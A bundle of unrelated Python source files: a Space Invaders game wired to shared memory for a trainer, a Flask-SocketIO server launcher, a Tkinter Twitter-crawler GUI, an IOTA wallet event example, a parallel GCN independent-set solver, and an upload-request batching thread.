else:
leftbullet = Bullet(self.player.rect.x + 8,
self.player.rect.y + 5, -1,
15, 'laser', 'left')
rightbullet = Bullet(self.player.rect.x + 38,
self.player.rect.y + 5, -1,
15, 'laser', 'right')
self.bullets.add(leftbullet)
self.bullets.add(rightbullet)
self.allSprites.add(self.bullets)
#self.sounds['shoot2'].play()
def make_enemies(self):
#enemies = EnemiesGroup(10, 5)
enemies = EnemiesGroup(16, 5)
for row in range(5):
for column in range(0, 16):
enemy = Enemy(row, column)
#enemy.rect.x = 157 + (column * 50)
enemy.rect.x = 7 + (column * 50)
enemy.rect.y = self.enemyPosition + (row * 45)
enemies.add(enemy)
self.enemies = enemies
def make_enemies_shoot(self):
if (time.get_ticks() - self.timer) > 200 and self.enemies:
#if (time.get_ticks() - self.timer) > 200 and self.enemies:
enemy = self.enemies.random_bottom()
# while not enemy.column == 0 and not enemy.column == 7 and not enemy.column == 15:
# enemy = self.enemies.random_bottom()
b = Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, 'enemylaser', 'center')
enemyBulletsList.append(b)
self.enemyBullets.add(b)
self.allSprites.add(self.enemyBullets)
self.timer = time.get_ticks()
def calculate_score(self, row):
scores = {0: 30,
1: 20,
2: 20,
3: 10,
4: 10,
5: choice([50, 100, 150, 300])
}
score = scores[row]
self.score += score
return score
def create_main_menu(self):
self.enemy1 = IMAGES['enemy3_1']
self.enemy1 = transform.scale(self.enemy1, (40, 40))
self.enemy2 = IMAGES['enemy2_2']
self.enemy2 = transform.scale(self.enemy2, (40, 40))
self.enemy3 = IMAGES['enemy1_2']
self.enemy3 = transform.scale(self.enemy3, (40, 40))
self.enemy4 = IMAGES['mystery']
self.enemy4 = transform.scale(self.enemy4, (80, 40))
self.screen.blit(self.enemy1, (318, 270))
self.screen.blit(self.enemy2, (318, 320))
self.screen.blit(self.enemy3, (318, 370))
self.screen.blit(self.enemy4, (299, 420))
def check_collisions(self):
sprite.groupcollide(self.bullets, self.enemyBullets, True, True)
for enemy in sprite.groupcollide(self.enemies, self.bullets,
True, True).keys():
#self.sounds['invaderkilled'].play()
self.calculate_score(enemy.row)
EnemyExplosion(enemy, self.explosionsGroup)
self.gameTimer = time.get_ticks()
for mystery in sprite.groupcollide(self.mysteryGroup, self.bullets,
True, True).keys():
mystery.mysteryEntered.stop()
#self.sounds['mysterykilled'].play()
score = self.calculate_score(mystery.row)
MysteryExplosion(mystery, score, self.explosionsGroup)
newShip = Mystery()
self.allSprites.add(newShip)
self.mysteryGroup.add(newShip)
for player in sprite.groupcollide(self.playerGroup, self.enemyBullets,
True, True).keys():
if self.life3.alive():
self.life3.kill()
elif self.life2.alive():
self.life2.kill()
elif self.life1.alive():
self.life1.kill()
else:
self.gameOver = True
self.startGame = False
#self.sounds['shipexplosion'].play()
ShipExplosion(player, self.explosionsGroup)
self.makeNewShip = True
self.shipTimer = time.get_ticks()
self.shipAlive = False
if self.enemies.bottom >= 540:
sprite.groupcollide(self.enemies, self.playerGroup, True, True)
if not self.player.alive() or self.enemies.bottom >= 600:
self.gameOver = True
self.startGame = False
sprite.groupcollide(self.bullets, self.allBlockers, True, True)
sprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)
if self.enemies.bottom >= BLOCKERS_POSITION:
sprite.groupcollide(self.enemies, self.allBlockers, False, True)
def create_new_ship(self, createShip, currentTime):
if createShip and (currentTime - self.shipTimer > 900):
self.player = Ship()
self.allSprites.add(self.player)
self.playerGroup.add(self.player)
self.makeNewShip = False
self.shipAlive = True
def create_game_over(self, currentTime):
self.screen.blit(self.background, (0, 0))
passed = currentTime - self.timer
# if passed < 750:
# self.gameOverText.draw(self.screen)
# elif 750 < passed < 1500:
# self.screen.blit(self.background, (0, 0))
# elif 1500 < passed < 2250:
# self.gameOverText.draw(self.screen)
# elif 2250 < passed < 2750:
# self.screen.blit(self.background, (0, 0))
# elif passed > 3000:
shm_gameover.buf[0] = 1
self.update_buffers(1)
while shm_gameover.buf[0] == 1:
t.sleep(0.001)
self.mainScreen = True
t.sleep(3)
for e in event.get():
if self.should_exit(e):
sys.exit()
def update_buffers(self, dead):
buffer = self.screen.get_buffer()
shm_screen.buf[:] = buffer.raw
del buffer
# Pack the score into three bytes (little-endian: low, middle, high byte)
shm_stats.buf[0] = self.score % 256
shm_stats.buf[1] = m.floor(self.score/256) % 256
shm_stats.buf[2] = m.floor(self.score/(256*256)) % 256
# Lives counter exposed to the trainer (offset by the dead flag)
shm_stats.buf[3] = len(self.livesGroup) - dead + 1
# Player x position (10..740) scaled to a single byte (0..255)
shm_stats.buf[4] = int(float(self.player.rect.x-10)/730.0*255)
if len(enemyBulletsList) > 0:
b = enemyBulletsList[0]
if not self.enemyBullets.has(b):
enemyBulletsList.remove(b)
for i in range(6):
if len(enemyBulletsList) > i:
b = enemyBulletsList[i]
shm_stats.buf[5+2*i] = int(b.rect.left/4)
shm_stats.buf[6+2*i] = int(b.rect.top/3)
else:
shm_stats.buf[5+2*i] = 0
shm_stats.buf[6+2*i] = 0
#print(len(enemyBulletsList))
# for e in event.get():
# if self.should_exit(e):
# sys.exit()
if self.keys[K_LEFT]:
shm_player_input.buf[0] = 1
else:
shm_player_input.buf[0] = 0
if self.keys[K_RIGHT]:
shm_player_input.buf[1] = 1
else:
shm_player_input.buf[1] = 0
# if e.type == KEYDOWN and e.key == K_SPACE:
# shm_player_input[2] = 1
# elif e.key == K_SPACE:
# shm_player_input[2] = 0
def main(self):
t.sleep(1)
while True:
if self.mainScreen:
self.screen.blit(self.background, (0, 0))
self.titleText.draw(self.screen)
self.titleText2.draw(self.screen)
self.enemy1Text.draw(self.screen)
self.enemy2Text.draw(self.screen)
self.enemy3Text.draw(self.screen)
self.enemy4Text.draw(self.screen)
self.create_main_menu()
# for e in event.get():
# if self.should_exit(e):
# sys.exit()
# if e.type == KEYUP:
# Only create blockers on a new game, not a new round
self.allBlockers = sprite.Group(self.make_blockers(0),
self.make_blockers(1),
self.make_blockers(2),
self.make_blockers(3))
#self.livesGroup.add(self.life1, self.life2, self.life3)
self.reset(0)
self.startGame = True
self.mainScreen = False
elif self.startGame:
if not self.enemies and not self.explosionsGroup:
currentTime = time.get_ticks()
if currentTime - self.gameTimer < 3000:
self.screen.blit(self.background, (0, 0))
self.scoreText2 = Text(FONT, 20, str(self.score),
GREEN, 85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.nextRoundText.draw(self.screen)
self.livesText.draw(self.screen)
self.livesGroup.update()
self.check_input()
if currentTime - self.gameTimer > 3000:
# Move enemies closer to bottom
self.enemyPosition += ENEMY_MOVE_DOWN
self.reset(self.score)
self.gameTimer += 3000
else:
currentTime = time.get_ticks()
self.play_main_music(currentTime)
self.screen.blit(self.background, (0, 0))
self.allBlockers.update(self.screen)
self.scoreText2 = Text(FONT, 20, str(self.score), GREEN,
85, 5)
self.scoreText.draw(self.screen)
self.scoreText2.draw(self.screen)
self.livesText.draw(self.screen)
self.check_input()
self.enemies.update(currentTime)
self.allSprites.update(self.keys, currentTime)
self.explosionsGroup.update(currentTime)
self.check_collisions()
self.create_new_ship(self.makeNewShip, currentTime)
self.make_enemies_shoot()
elif self.gameOver:
currentTime = time.get_ticks()
# Reset enemy starting position
self.enemyPosition = ENEMY_DEFAULT_POSITION
self.create_game_over(currentTime)
self.score += 1
display.update()
self.update_buffers(0)
while shm_gameover.buf[0] == 1:
t.sleep(1)
for event in pygame.event.get():
if event.type == QUIT:
break
self.clock.tick(60)
game = SpaceInvaders()
game.main()
|
__main__.py
|
import os
import ssl
from multiprocessing import Process
from flask import Flask
from openmfd.server import create_app, socketio
from openmfd.ssl.generate import generate_instance_ssl
app = create_app()
def main():
has_certificate = os.path.isfile(app.instance_path + "/cert.pem")
if not has_certificate:
generate_instance_ssl(app.instance_path)
run_server(app)
# process = Process(target=run_server, args=(app,))
# process.start()
def run_server(app: Flask):
keyfile = app.instance_path + "/key.pem"
certfile = app.instance_path + "/cert.pem"
# ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
# ctx.load_cert_chain(
# certfile,
# keyfile,
# )
socketio.run(
app,
debug=True,
use_reloader=False,
host='0.0.0.0',
port=6789,
ssl_version=ssl.PROTOCOL_TLSv1_2,
keyfile=keyfile,
certfile=certfile,
)
main()
|
guiCrawling.py
|
import Tkinter as tk
from versionControl import greeting
import AppKit
import subprocess
import threading
import time
import twitter_stream_download
import readJson
import os
start_bt_ms = "Welcome! Think about the keyword you want to know."
class App(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.pack()
self.master.title("")
self.master.resizable(False, False)
self.master.tk_setPalette(background='#ececec')
self.master.protocol('WM_DELETE_WINDOW', self.click_cancel)
self.master.bind('<Return>', self.click_ok)
self.master.bind('<Escape>', self.click_cancel)
x = (self.master.winfo_screenwidth() - self.master.winfo_reqwidth()) / 2
y = (self.master.winfo_screenheight() - self.master.winfo_reqheight()) / 3
self.master.geometry("+{}+{}".format(x, y))
self.master.config(menu=tk.Menu(self))
tk.Message(self, text= greeting(),
font='System 18 bold', justify='left', aspect=800).pack(pady=(5, 0))
tk.Message(self, text= "Step 1. Crawling",
font='System 14 bold', justify='left', aspect=800).pack(pady=(5, 0))
## frame 1
f1 = tk.Frame(self)
f1.pack(padx=60, pady=15, anchor='w')
self.f1l1 = tk.Label(f1, text='The tag or keyword you wish to grab from Twitter:')
self.f1l1.grid(row=0,column=0,columnspan=2,sticky='w')
self.f1l1L = tk.Label(f1, text='Keyword:')
self.f1l1L.grid(row=1, column=0, sticky='w')
self.user_input = tk.Entry(f1, background='white', width=30)
self.user_input.grid(row=1, column=1, sticky='w')
tk.Label(f1, text=' ').grid(row=2, column=0, sticky='w')
self.f1l2 = tk.Label(f1, text='The folder where you wish to store the data (defaults to ./output):')
self.f1l2.grid(row=3,column=0,columnspan=2,sticky='w')
self.f1l2L = tk.Label(f1, text='Path:')
self.f1l2L.grid(row=4, column=0, sticky='w')
self.pass_input = tk.Entry(f1, background='white', width=30)
self.pass_input.insert(0,"./output")
self.pass_input.grid(row=4, column=1, sticky='w')
##frame middle 1.5
f1_5 = tk.Frame(self)
f1_5.pack(padx=60, pady=(5,10), anchor='w')
self.ctl_tx = tk.Label(f1_5, anchor="w",fg='black',state='disabled',
text="Control crawling by following buttons after started:",width=45)
self.ctl_tx.pack()
self.ctl_1 = tk.Button(f1_5, text='Stop', height=1, width=6, state='disabled', command=self.click_1)
self.ctl_1.bind('<Enter>', self.hover_1)
self.ctl_1.bind('<Leave>', self.hover_off)
self.ctl_1.pack(side='right')
self.ctl_2 = tk.Button(f1_5, text='Fetch', height=1, width=6, state='disabled', command=self.click_2)
self.ctl_2.bind('<Enter>', self.hover_2)
self.ctl_2.bind('<Leave>', self.hover_off)
self.ctl_2.pack(side='right')
self.ctl_3 = tk.Button(f1_5, text='Check', height=1, width=6, state='disabled', command=self.click_3)
self.ctl_3.bind('<Enter>', self.hover_3)
self.ctl_3.bind('<Leave>', self.hover_off)
self.ctl_3.pack(side='right')
##frame 2
f2 = tk.Frame(self)
f2.pack(padx=60, pady=(10,10), anchor='w')
self.label = tk.Label(f2, anchor="w",fg="white",bg="blue", text=start_bt_ms, width=45)
self.label.pack()
tk.Label(f2, anchor="w",text=" ", width=45).pack()
## frame last
fb = tk.Frame(self)
fb.pack(padx=60, pady=(0, 15), anchor='e')
self.stb = tk.Button(fb, text='Start !', height=1, width=6, default='active', command=self.click_ok)
self.stb.pack(side='right')
self.stb.bind("<Enter>", self.hover_on)
self.stb.bind("<Leave>", self.hover_off)
self.stb2 = tk.Button(fb, text='Quit...', height=1, width=6, command=self.click_cancel)
self.stb2.pack(side='right', padx=10)
def hover_1(self, event=None):
self.label.config(text="Fetch contents, stop current crawling process and quit")
def hover_2(self, event=None):
self.label.config(text="Fetch meaningful contents of tweets for training in next step")
def hover_3(self, event=None):
self.label.config(text="Check number of tweets have been crawled")
def hover_on(self, event=None):
self.label.config(text="Click to start crawling")
def hover_off(self, event=None):
self.label.config(text=start_bt_ms)
def click_ok(self, event=None):
print "keyword: " + self.user_input.get()
print "folder: " + self.pass_input.get()
self.file_name = self.pass_input.get() + "/stream_" + self.user_input.get() + ".json"
print self.file_name
self.label.config(text="Crawling has started!")
global start_bt_ms
start_bt_ms = "Crawling has started!"
self.stb.config(state='disabled')
self.stb2.config(state='disabled')
self.ctl_1.config(state='active')
self.ctl_2.config(state='active')
self.ctl_3.config(state='active')
self.ctl_tx.config(state='normal')
self.user_input.config(state='disabled')
self.pass_input.config(state='disabled')
self.f1l1.config(state='disabled')
self.f1l1L.config(state='disabled')
self.f1l2.config(state='disabled')
self.f1l2L.config(state='disabled')
if not os.path.exists(self.pass_input.get()):
os.makedirs(self.pass_input.get())
newthread = threading.Thread(target=self.threadCrawl)
newthread.daemon = True
newthread.start()
def threadCrawl(self, event=None):
print "thread!"
twitter_stream_download.main(self.user_input.get(), self.pass_input.get())
def click_cancel(self, event=None):
print("The user clicked 'Cancel'")
self.master.destroy()
def click_1(self, event=None):
print "Stop"
readJson.main(self.file_name)
self.master.destroy()
def click_2(self, event=None):
lines = readJson.main(self.file_name)
tmp = "Fetch: " + str(lines) + " lines of contents are fetched"
self.label.config(text=tmp)
print "Fetch"
def click_3(self, event=None):
if os.path.isfile(self.file_name):
lines = sum(1 for line in open(self.file_name))
else:
lines = 0
tmp = "Check: " + str(lines) + " tweets have been crawled"
self.label.config(text=tmp)
global start_bt_ms
start_bt_ms = tmp
print "Check"
def crawling():
info = AppKit.NSBundle.mainBundle().infoDictionary()
info['LSUIElement'] = True
fixbug = "/Users/wuwenzhen/python/tweets/developSoftware/dustbin/py2app/venv/lib/python2.7/site-packages/pip/_vendor/requests/cacert.pem"
if os.path.isfile(fixbug):
os.environ['REQUESTS_CA_BUNDLE'] = fixbug
root = tk.Tk()
app = App(root)
AppKit.NSApplication.sharedApplication().activateIgnoringOtherApps_(True)
app.mainloop()
|
7_event.py
|
# Copyright 2020 IOTA Stiftung
# SPDX-License-Identifier: Apache-2.0
import iota_wallet
import threading
import queue
import time
# This example shows how to listen to on_balance_change event.
# The queue to store received events
q = queue.Queue()
def worker():
"""The worker to process the queued events.
"""
while True:
item = q.get(True)
print(f'Get event: {item}')
q.task_done()
def balance_changed_event_processing(event):
"""Processing function when event is received.
"""
print(f'On balanced changed: {event}')
q.put(event)
# Get the account manager
manager = iota_wallet.AccountManager(
storage='Stronghold', storage_path='./alice-database')
manager.set_stronghold_password("password")
# Get the account
account = manager.get_account('Alice')
print(f'Account: {account.alias()}')
# Always sync before doing anything with the account
print('Syncing...')
synced = account.sync().execute()
# Get the latest unused address
last_address_obj = account.latest_address()
print(f"Address: {last_address_obj['address']}")
# turn-on the worker thread
threading.Thread(target=worker, daemon=True).start()
# listen to the on_balance_change event
iota_wallet.on_balance_change(balance_changed_event_processing)
# Use the Chrysalis Faucet to send testnet tokens to your address:
print(
f"Fill your Address ({last_address_obj['address']['inner']}) with the Faucet: https://faucet.testnet.chrysalis2.com/")
print("To see how the on_balance_change is called, please send tokens to the address in 1 min")
time.sleep(60)
# block until all tasks are done
q.join()
print('All work completed')
|
demo_parallel.py
|
from __future__ import division
from __future__ import print_function
import sys
import os
sys.path.append( '%s/gcn' % os.path.dirname(os.path.realpath(__file__)) )
# add the library path for graph reduction and local search
sys.path.append( '%s/kernel' % os.path.dirname(os.path.realpath(__file__)) )
import signal
# Make Python ignore the SIGPIPE signal and not raise an exception
signal.signal(signal.SIGPIPE,signal.SIG_DFL)
import time
import scipy.io as sio
import numpy as np
import scipy.sparse as sp
import queue
import multiprocessing as mp
from multiprocessing import Manager, Value, Lock
from copy import deepcopy
# import the library for graph reduction and local search
from reduce_lib import reducelib
from utils import *
# test data path
data_path = "./data"
val_mat_names = os.listdir(data_path)
# no printf
# f=open("/Benz code/NPHard/result.txt","w+")
# sys.stdout=f
f=open("/Benz code/NPHard/result.txt","a")
sys.stdout = f
sys.stderr = f # redirect std err, if necessary
# Define model evaluation function
def evaluate(sess, model, features, support, placeholders):
t_test = time.time()
feed_dict_val = construct_feed_dict4pred(features, support, placeholders)
outs_val = sess.run([model.outputs_softmax], feed_dict=feed_dict_val)
return (time.time() - t_test), outs_val[0]
def findNodeEdges(adj):
nn = adj.shape[0]
edges = []
for i in range(nn):
edges.append(adj.indices[adj.indptr[i]:adj.indptr[i+1]])
return edges
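# Illustration: for the CSR adjacency matrix of a triangle graph,
# sp.csr_matrix([[0, 1, 1], [1, 0, 1], [1, 1, 0]]), findNodeEdges returns
# [array([1, 2]), array([0, 2]), array([0, 1])] -- edges[i] lists the neighbours of node i.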
def isis_v2(edges, nIS_vec_local, cn):
# True if any neighbour of node cn is already in the independent set
return np.sum(nIS_vec_local[edges[cn]] == 1) > 0
def isis(edges, nIS_vec_local):
# True if any edge has both endpoints marked 1, i.e. the labelling is not an independent set
tmp = (nIS_vec_local==1)
return np.sum(tmp[edges[0]]*tmp[edges[1]]) > 0
def add_rnd_q(cns, nIS_vec_local, pnum, lock):
global adj_0
nIS_vec_local[cns] = 1
tmp = sp.find(adj_0[cns, :] == 1)
nIS_vec_local[tmp[1]] = 0
remain_vec_tmp = (nIS_vec_local == -1)
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
if reduce_graph(adj, nIS_vec_local, pnum, lock):
return True
return False
def fake_reduce_graph(adj):
reduced_node = -np.ones(adj.shape[0])
reduced_adj = adj
mapping = np.arange(adj.shape[0])
reverse_mapping = np.arange(adj.shape[0])
crt_is_size = 0
return reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size
def fake_local_search(adj, nIS_vec):
return nIS_vec.astype(int)
def reduce_graph(adj, nIS_vec_local, pnum, lock):
global best_IS_num
global best_IS_vec
global bsf_q
global adj_0
global q_ct
global id
global out_id
global res_ct
remain_vec = (nIS_vec_local == -1)
# reduce graph
reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size = api.reduce_graph(adj)
#reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size = fake_reduce_graph(adj)
nIS_vec_sub = reduced_node.copy()
nIS_vec_sub_tmp = reduced_node.copy()
nIS_vec_sub[nIS_vec_sub_tmp == 0] = 1
nIS_vec_sub[nIS_vec_sub_tmp == 1] = 0
reduced_nn = reduced_adj.shape[0]
# update MIS after reduction
tmp = sp.find(adj[nIS_vec_sub == 1, :] == 1)
nIS_vec_sub[tmp[1]] = 0
nIS_vec_local[remain_vec] = nIS_vec_sub
nIS_vec_local[nIS_vec_local == 2] = -1
#sys.stdout = open('/Benz code/NPHard/result.txt')
# if the whole graph is reduced, we find a candidate
if reduced_nn == 0:
remain_vec_tmp = (nIS_vec_local == -1)
if np.sum(remain_vec_tmp) == 0:
# get a solution
with lock:
res_ct.value += 1
local_res_ct = res_ct.value
nIS_vec_local = api.local_search(adj_0, nIS_vec_local)
#nIS_vec_local = fake_local_search(adj_0, nIS_vec_local)
with lock:
if np.sum(nIS_vec_local) > best_IS_num.value:
best_IS_num.value = np.sum(nIS_vec_local)
best_IS_vec = deepcopy(nIS_vec_local)
sio.savemat('./res_%04d/%s' % (
time_limit, val_mat_names[id]), {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
print("PID: %02d" % pnum, "ID: %03d" % id, "QItem: %03d" % q_ct.value, "Res#: %03d" % local_res_ct,
"Current: %d" % (np.sum(nIS_vec_local)), "Best: %d" % best_IS_num.value, "Reduction")
return True
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
with lock:
bsf_q.append([adj, nIS_vec_local.copy(), remain_vec.copy(), reduced_adj, reverse_mapping.copy()])
else:
with lock:
bsf_q.append([adj, nIS_vec_local.copy(), remain_vec.copy(), reduced_adj, reverse_mapping.copy()])
return False
def MPSearch(pnum, lock):
import tensorflow as tf
from models import GCN_DEEP_DIVER
global best_IS_num #
global bsf_q #
global q_ct #
global res_ct #
global best_IS_vec #
global start_time
global adj_0
global opt_num
global edges_0
global nn
global features_all
global N_bd
# Settings
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('model', 'gcn_cheby', 'Model string.') # 'gcn', 'gcn_cheby', 'dense'
flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')
flags.DEFINE_integer('epochs', 201, 'Number of epochs to train.')
flags.DEFINE_integer('hidden1', 32, 'Number of units in hidden layer 1.')
flags.DEFINE_integer('diver_num', 32, 'Number of outputs.')
flags.DEFINE_float('dropout', 0, 'Dropout rate (1 - keep probability).')
flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')
flags.DEFINE_integer('early_stopping', 1000, 'Tolerance for early stopping (# of epochs).')
flags.DEFINE_integer('max_degree', 1, 'Maximum Chebyshev polynomial degree.')
flags.DEFINE_integer('num_layer', 20, 'number of layers.')
# Some preprocessing
num_supports = 1 + FLAGS.max_degree
model_func = GCN_DEEP_DIVER
# Define placeholders
placeholders = {
'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],
'features': tf.sparse_placeholder(tf.float32, shape=(None, N_bd)), # featureless: #points
'labels': tf.placeholder(tf.float32, shape=(None, 2)), # 0: not linked, 1:linked
'labels_mask': tf.placeholder(tf.int32),
'dropout': tf.placeholder_with_default(0., shape=()),
'num_features_nonzero': tf.placeholder(tf.int32) # helper variable for sparse dropout
}
# Create model
model = model_func(placeholders, input_dim=N_bd, logging=True)
# os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')
# os.environ['CUDA_VISIBLE_DEVICES']=str(np.argmax([int(x.split()[2]) for x in open('tmp','r').readlines()]))
# os.system('rm tmp')
#os.environ['CUDA_VISIBLE_DEVICES'] = str(0)
# Initialize session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
# sess = tf.Session()
# Init variables
saver = tf.train.Saver(max_to_keep=1000)
sess.run(tf.global_variables_initializer())
ckpt = tf.train.get_checkpoint_state("./model")
print('%02d loaded' % pnum + ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
noout = FLAGS.diver_num # number of outputs
while time.time()-start_time < time_limit:
# if best_IS_num.value == opt_num:
# break
if len(bsf_q) == 0:
if reduce_graph(adj_0, -np.ones(nn), pnum, lock):
break
with lock:
if len(bsf_q) == 0:
continue
q_item = bsf_q.pop(np.random.randint(0,len(bsf_q)))
q_ct.value += 1
adj = q_item[0]
remain_vec = deepcopy(q_item[2])
reduced_adj = q_item[3]
reverse_mapping = deepcopy(q_item[4])
remain_nn = adj.shape[0]
reduced_nn = reduced_adj.shape[0]
if reduced_nn != 0:
# GCN
t1 = features_all[0][0:reduced_nn*N_bd,:]
t2 = features_all[1][0:reduced_nn*N_bd]
t3 = (reduced_nn, N_bd)
features = (t1, t2, t3)
support = simple_polynomials(reduced_adj, FLAGS.max_degree)
_, z_out = evaluate(sess, model, features, support, placeholders)
out_id = np.random.randint(noout)
# if best_IS_num.value == opt_num:
# break
nIS_vec = deepcopy(q_item[1])
nIS_Prob_sub_t = z_out[:, 2 * out_id + 1]
nIS_Prob_sub = np.zeros(remain_nn)
nIS_Prob_sub[reverse_mapping] = nIS_Prob_sub_t
nIS_Prob = np.zeros(nn)
nIS_Prob[remain_vec] = nIS_Prob_sub
# chosen nodes
cns_sorted = np.argsort(1 - nIS_Prob)
# tt = time.time()
nIS_vec_tmp = deepcopy(nIS_vec)
for cid in range(nn):
cn = cns_sorted[cid]
if isis_v2(edges_0, nIS_vec_tmp, cn):
break
nIS_vec_tmp[cn] = 1
# check graph
if np.random.random_sample() > 0.7:
add_rnd_q(cns_sorted[:(cid + 1)], deepcopy(nIS_vec), pnum, lock)
# print("time=", "{:.5f}".format((time.time() - tt)))
cns = cns_sorted[:cid]
nIS_vec[cns] = 1
tmp = sp.find(adj_0[cns, :] == 1)
nIS_vec[tmp[1]] = 0
remain_vec_tmp = (nIS_vec == -1)
if np.sum(remain_vec_tmp) == 0:
# get a solution
with lock:
res_ct.value += 1
local_res_ct = res_ct.value
nIS_vec = api.local_search(adj_0, nIS_vec)
#nIS_vec = fake_local_search(adj_0, nIS_vec)
with lock:
if np.sum(nIS_vec) > best_IS_num.value:
best_IS_num.value = np.sum(nIS_vec)
best_IS_vec = deepcopy(nIS_vec)
sio.savemat('./res_%04d/%s' % (
time_limit, val_mat_names[id]), {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
print("PID: %02d" % pnum, "ID: %03d" % id, "QItem: %03d" % q_ct.value, "Res#: %03d" % local_res_ct,
"Current: %d" % (np.sum(nIS_vec)), "Best: %d" % best_IS_num.value, "Network")
continue
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
if reduce_graph(adj, nIS_vec, pnum, lock):
continue
else:
nIS_vec = deepcopy(q_item[1])
if reduce_graph(adj, nIS_vec, pnum, lock):
continue
time_limit = 60000000000 # time limit for searching
if not os.path.isdir("./res_%04d"%time_limit):
os.makedirs("./res_%04d"%time_limit)
# for graph reduction and local search
api = reducelib()
for id in range(len(val_mat_names)):
manager = Manager()
bsf_q = manager.list()
q_ct = Value('i', 0)
res_ct = Value('i', 0)
best_IS_num = Value('i', -1)
best_IS_vec = []
lock = Lock()
mat_contents = sio.loadmat(data_path + '/' + val_mat_names[id])
adj_0 = mat_contents['adj']
# yy = mat_contents['indset_label']
# opt_num = np.sum(yy[:, 0])
# edges_0 = sp.find(adj_0) # for isis version 1
edges_0 = findNodeEdges(adj_0)
nn = adj_0.shape[0]
N_bd = 32
# process features and save them in advance
features_all = np.ones([nn, N_bd])
features_all = sp.lil_matrix(features_all)
features_all = preprocess_features(features_all)
start_time = time.time()
processes = [mp.Process(target=MPSearch, args=(pnum, lock)) for pnum in range(16)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
print(time.time() - start_time)
# sio.savemat('result_IS4SAT_deep_ld32_c32_l20_cheb1_diver32_res32/res_tbf_mp_e_satlib_%04d/%s' % (time_limit, val_mat_names[id]),
# {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
|
step_prepare.py
|
"""Batching file prepare requests to our API."""
import queue
import threading
import time
from typing import Any, Callable, NamedTuple, Sequence, Union
# Request for a file to be prepared.
class RequestPrepare(NamedTuple):
prepare_fn: Callable[..., Any]
on_prepare: Callable[..., Any]
response_queue: "queue.Queue[ResponsePrepare]"
RequestFinish = NamedTuple("RequestFinish", ())
class ResponsePrepare(NamedTuple):
upload_url: str
upload_headers: Sequence[str]
birth_artifact_id: str
Event = Union[RequestPrepare, RequestFinish, ResponsePrepare]
class StepPrepare:
"""A thread that batches requests to our file prepare API.
Any number of threads may call prepare_async() in parallel. The StepPrepare worker thread
will batch requests up and send them all to the backend at once.
"""
def __init__(self, api, batch_time, inter_event_time, max_batch_size):
self._api = api
self._inter_event_time = inter_event_time
self._batch_time = batch_time
self._max_batch_size = max_batch_size
self._request_queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
while True:
request = self._request_queue.get()
if isinstance(request, RequestFinish):
break
finish, batch = self._gather_batch(request)
prepare_response = self._prepare_batch(batch)
# send responses
for prepare_request in batch:
name = prepare_request.prepare_fn()["name"]
response_file = prepare_response[name]
upload_url = response_file["uploadUrl"]
upload_headers = response_file["uploadHeaders"]
birth_artifact_id = response_file["artifact"]["id"]
if prepare_request.on_prepare:
prepare_request.on_prepare(
upload_url, upload_headers, birth_artifact_id
)
prepare_request.response_queue.put(
ResponsePrepare(upload_url, upload_headers, birth_artifact_id)
)
if finish:
break
def _gather_batch(self, first_request):
batch_start_time = time.time()
batch = [first_request]
while True:
try:
request = self._request_queue.get(
block=True, timeout=self._inter_event_time
)
if isinstance(request, RequestFinish):
return True, batch
batch.append(request)
remaining_time = self._batch_time - (time.time() - batch_start_time)
if remaining_time < 0 or len(batch) >= self._max_batch_size:
break
except queue.Empty:
break
return False, batch
def _prepare_batch(self, batch):
"""Execute the prepareFiles API call.
Arguments:
batch: List of RequestPrepare objects
Returns:
dict of (save_name: ResponseFile) pairs where ResponseFile is a dict with
an uploadUrl key. The value of the uploadUrl key is None if the file
already exists, or a url string if the file should be uploaded.
"""
file_specs = []
for prepare_request in batch:
file_spec = prepare_request.prepare_fn()
file_specs.append(file_spec)
return self._api.create_artifact_files(file_specs)
def prepare_async(self, prepare_fn, on_prepare=None):
"""Request the backend to prepare a file for upload.
Returns:
            response_queue: a queue that will receive a ResponsePrepare. Its upload_url is
            either a file upload url, or None if the file doesn't need to be uploaded.
"""
response_queue = queue.Queue()
self._request_queue.put(RequestPrepare(prepare_fn, on_prepare, response_queue))
return response_queue
def prepare(self, prepare_fn):
return self.prepare_async(prepare_fn).get()
def start(self):
self._thread.start()
def finish(self):
self._request_queue.put(RequestFinish())
def is_alive(self):
return self._thread.is_alive()
def shutdown(self):
self.finish()
self._thread.join()
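# A minimal usage sketch with a hypothetical stub API object whose
# create_artifact_files() returns the (save_name -> ResponseFile) mapping
# documented in _prepare_batch(). All names and values below are illustrative.
if __name__ == "__main__":

    class _StubApi:
        def create_artifact_files(self, file_specs):
            # Pretend every file needs an upload and echo back one entry per spec.
            return {
                spec["name"]: {
                    "uploadUrl": "https://example.invalid/upload/" + spec["name"],
                    "uploadHeaders": [],
                    "artifact": {"id": "artifact-0"},
                }
                for spec in file_specs
            }

    step = StepPrepare(_StubApi(), batch_time=0.1, inter_event_time=0.05, max_batch_size=10)
    step.start()
    result_queue = step.prepare_async(lambda: {"name": "model.bin"})
    print(result_queue.get())  # ResponsePrepare(upload_url=..., upload_headers=[], birth_artifact_id='artifact-0')
    step.shutdown()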
|
pokeslack.py
|
#!/usr/bin/python
